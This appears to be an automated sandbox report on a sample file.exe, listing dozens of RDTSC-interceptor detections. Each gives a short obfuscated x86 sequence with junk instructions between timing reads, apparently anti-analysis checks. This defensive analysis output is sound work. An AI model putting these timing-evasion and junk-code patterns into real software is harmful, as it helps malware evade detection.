Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7263 second address: 2E7267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7267 second address: 2E7270 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7270 second address: 2E7276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E7276 second address: 2E729E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED12076Ah 0x00000009 popad 0x0000000a jmp 00007FD7ED120771h 0x0000000f jo 00007FD7ED12076Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E6CFC second address: 2E6D06 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD7ECCCADECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EA271 second address: 2EA28D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD7ED120772h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EA28D second address: 2EA29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD7ECCCADE6h 0x0000000a jng 00007FD7ECCCADE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EA29D second address: 2EA2A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EA2A1 second address: 2EA2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F3903 second address: 2F390F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F390F second address: 2F3913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F3402 second address: 2F3406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F3584 second address: 2F35DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD7ECCCAE15h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD7ECCCADEBh 0x00000012 jmp 00007FD7ECCCADF1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F35DC second address: 2F35F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120774h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2F35F6 second address: 2F35FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB25B second address: 2FB273 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD7ED120766h 0x00000012 jc 00007FD7ED120766h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FB273 second address: 2FB277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3049A2 second address: 3049A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3049A6 second address: 3049B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 309044 second address: 30907E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED120773h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jbe 00007FD7ED120766h 0x00000011 jmp 00007FD7ED120774h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 310F0C second address: 310F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311218 second address: 311224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD7ED120768h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311224 second address: 311253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD7ECCCAE0Fh 0x0000000f jmp 00007FD7ECCCADF7h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311253 second address: 31125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311F89 second address: 311F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316419 second address: 316433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120776h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 323F94 second address: 323FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FD7ECCCADE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C518 second address: 32C522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C522 second address: 32C53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADF6h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C53C second address: 32C540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C540 second address: 32C54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32275E second address: 3227A5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7ED120766h 0x00000008 jmp 00007FD7ED120778h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007FD7ED120768h 0x00000015 jnl 00007FD7ED12076Ah 0x0000001b pushad 0x0000001c popad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push ecx 0x00000020 jnc 00007FD7ED120766h 0x00000026 pop ecx 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007FD7ED12076Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227A5 second address: 3227B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD7ECCCADE8h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3227B1 second address: 3227BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FD7ED120766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3391DC second address: 3391E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3391E2 second address: 3391EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351548 second address: 351574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 jmp 00007FD7ECCCADF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351574 second address: 3515C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FD7ED12076Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 jmp 00007FD7ED120770h 0x00000018 jg 00007FD7ED120766h 0x0000001e pop edx 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007FD7ED120778h 0x00000027 pop edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518A9 second address: 3518AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518AD second address: 3518B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518B3 second address: 3518D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD7ECCCADF6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518D3 second address: 3518DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3518DD second address: 3518FC instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ECCCADEAh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnl 00007FD7ECCCADE8h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007FD7ECCCADE6h 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351EA3 second address: 351EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351EA9 second address: 351EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 352168 second address: 35216C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35216C second address: 352189 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD7ECCCADE8h 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FD7ECCCADE8h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3522F0 second address: 3522F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3522F6 second address: 352311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD7ECCCADF2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355284 second address: 355295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007FD7ED120766h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355295 second address: 35529A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35668F second address: 356699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD7ED120766h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356699 second address: 3566CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 jmp 00007FD7ECCCADF2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007FD7ECCCADEAh 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3566CB second address: 3566D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357E63 second address: 357E6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD7ECCCADE6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359D37 second address: 359D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359D3B second address: 359D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD7ECCCADF6h 0x0000000d jmp 00007FD7ECCCADEAh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD7ECCCADEAh 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FD7ECCCADEFh 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486005B second address: 48600CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED12076Fh 0x00000009 and cx, A06Eh 0x0000000e jmp 00007FD7ED120779h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD7ED120770h 0x0000001a sub ecx, 6D1A6BE8h 0x00000020 jmp 00007FD7ED12076Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD7ED120774h 0x00000031 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48600CA second address: 4860117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1574B6F4h 0x00000008 pushfd 0x00000009 jmp 00007FD7ECCCADEDh 0x0000000e adc eax, 28EBA8B6h 0x00000014 jmp 00007FD7ECCCADF1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov ebx, eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD7ECCCADF6h 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860117 second address: 4860136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120772h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860136 second address: 4860153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840EF2 second address: 4840F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED120776h 0x00000009 sbb ecx, 05074B68h 0x0000000f jmp 00007FD7ED12076Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FD7ED120776h 0x0000001e push eax 0x0000001f jmp 00007FD7ED12076Bh 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 mov ax, D85Bh 0x0000002a mov si, 9F37h 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007FD7ED12076Ah 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD7ED12076Ah 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840F6A second address: 4840F79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E9B second address: 4880EE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD7ED120771h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FD7ED120773h 0x00000018 mov dx, ax 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48407C1 second address: 48407D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADEBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48407D1 second address: 4840816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FD7ED12076Fh 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 pushfd 0x00000012 jmp 00007FD7ED120770h 0x00000017 and ax, AE28h 0x0000001c jmp 00007FD7ED12076Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840816 second address: 484081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484071B second address: 484071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484071F second address: 4840725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484046E second address: 4840492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7ED12076Ch 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840492 second address: 4840498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880DC5 second address: 4880E0D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD7ED12076Bh 0x00000008 or esi, 650C4BAEh 0x0000000e jmp 00007FD7ED120779h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FD7ED12076Eh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E0D second address: 4880E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E11 second address: 4880E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E17 second address: 4880E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E1D second address: 4880E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880E21 second address: 4880E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, si 0x00000012 mov cl, 28h 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48405A0 second address: 4840659 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD7ED12076Eh 0x00000008 sbb ch, FFFFFFB8h 0x0000000b jmp 00007FD7ED12076Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 4E05B9EFh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushad 0x0000001c mov ecx, 7354BA3Dh 0x00000021 pushfd 0x00000022 jmp 00007FD7ED12076Ah 0x00000027 or cx, 9018h 0x0000002c jmp 00007FD7ED12076Bh 0x00000031 popfd 0x00000032 popad 0x00000033 pushfd 0x00000034 jmp 00007FD7ED120778h 0x00000039 add cx, FA78h 0x0000003e jmp 00007FD7ED12076Bh 0x00000043 popfd 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 mov ah, bh 0x00000049 mov bx, si 0x0000004c popad 0x0000004d xchg eax, ebp 0x0000004e jmp 00007FD7ED12076Ah 0x00000053 mov ebp, esp 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push edx 0x00000059 pop ecx 0x0000005a pushfd 0x0000005b jmp 00007FD7ED120779h 0x00000060 jmp 00007FD7ED12076Bh 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850E34 second address: 4850E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850E38 second address: 4850E4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850E4B second address: 4850E79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADEFh 0x00000008 mov ecx, 290F340Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD7ECCCADF1h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850E79 second address: 4850EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD7ED12076Ah 0x00000012 pop ecx 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850EA1 second address: 4850ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD7ECCCADF0h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD7ECCCADEAh 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850ED2 second address: 4850EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850EE1 second address: 4850EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADF4h 0x00000009 rdtsc
